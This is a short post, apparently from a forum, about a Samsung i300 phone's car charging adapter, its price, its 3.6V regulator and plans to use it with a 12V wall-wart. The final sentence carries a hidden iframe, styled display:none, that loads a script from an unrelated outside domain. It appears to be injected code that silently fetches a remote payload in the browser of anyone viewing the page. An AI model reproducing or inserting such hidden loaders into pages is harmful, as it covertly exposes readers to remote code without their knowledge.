I was about to bid on eBay where the car adapter sells for $40-50, when I saw the product on the Samsung site at $30 with free surface shipping.

A car's battery voltage (at the lighter socket) varies from below 10V to a peak of about 15V. The cord includes a built-in regulator to ensure 3.6V with little variation, regardless of battery condition or what the alternator is putting out.

Since the i300's battery life is a problem for me, I plan to use that adapter in the car, and *also* in my office with a common 12V wall-wart to keep the i300 charged.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
